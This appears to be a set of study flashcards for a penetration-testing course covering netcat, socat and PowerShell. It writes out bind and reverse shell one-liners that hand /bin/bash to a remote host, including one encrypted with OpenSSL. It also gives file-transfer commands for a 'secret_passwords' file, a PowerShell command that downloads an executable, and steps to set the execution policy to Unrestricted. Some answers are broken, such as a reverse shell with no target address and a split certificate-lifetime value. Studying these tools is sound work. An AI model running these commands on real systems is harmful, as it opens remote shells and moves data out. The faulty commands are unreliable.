Chapter 4: Practical Tools Flashcards
Type out a netcat command listening on port 4444.
nc -nvlp 4444
Type out a netcat command connecting to another address on port 4444
nc -nv 10.11.1.1 4444
What does the -e switch on netcat do? Explain it in terms of data streams.
the -e switch redirects input output and error into the port. an application like /bin/bash being executed will have all it’s data sent to the port - meaning whoever connects to the port will recieve that info.
Type out a netcat bind shell.
nc -lvnp 4444 -e /bin/bash
Type out a netcat reverse shell.
nc -nv 4444 -e /bin/bash
How do you connect to a remote server using socat?
socat - TCP4:10.11.1.1:80
How do you use socat to create a listener?
socat - TCP4-LISTEN:443 STDOUT
How do you send a file using socat?
socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Recieving a file from socat, what do we type?
socat TCP4:10.11.0.4:443 file:recieved_secret_password.txt,create
In terms of socat reverse shells, how do we set up a listener?
sudo socat TCP4-LISTEN:443 STDOUT
In terms of socat reverse shells, how do we initiate the connection?
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
How do we send a file using netcat? Type out the client and server commands
nc -nv 10.11.1.3 80 < file.txt
nc -nvlp 80 > file.txt
use the openssl command to create a self-signed certificate - so we can use an encrypted socat connection.
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind_shell.crt
After we have generated a certificate for ssl, what next steps including commands do we do?
We need to convert the bind_shell.key and bind_shell.crt into bind_shell.pem so that socat can read it.
we do this by using cat bind_shell.key bind_shell.crt > bind_shell.pem
After the SSL certificate has been completed, how do we then start a listener?
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin
/bash
On Windows Powershell, how do we review the execution policy?
Get-ExecutionPolicy
Why is the execution policy on Windows Powershell important?
The execution on Windows Powershell by default is set to Restricted, meaning we cannot run any scripts or configuration files. This is for security reasons, but also restricts our usage of the shell and why we turn it off.
On Windows Powershell how do we turn the execution policy to Unrestricted?
Set-ExecutionPolicy Unrestricted
How do we download a file using Powershell?
powershell -c “(new-object System.Net.Webclient).DownloadFile(‘http://10.11.1.1/wget.exe’,’C:\Users\Dan\Desktop\wget.exe’)”
In the Powershell download command, what does the c switch do?
Executes the supplied command enclose in double quotes.
In a Powershell command what does the new-object cmdlet do?
Instantiate either a .Net Framework or a COM object.
Within the context of a Powershell download command, expand on what “new-object System.Net.WebClient” means.
new-object instantiates either a .Net framework or a COM object. The new-object cmdlet has created an instance of the WebClient which is defined in the System.Net namespace. The WebClient class is used to access resources from a URI and exposes a public method known as DownloadFile which needs two parameters, a source location and target location.
What is Powercat?
Powercat is essentially the Powershell version of netcat.
In the context of Powershell, what is Dot-sourcing?
Dot-sourcing allows all functions and variables declared in the script available for the current Powershell session.
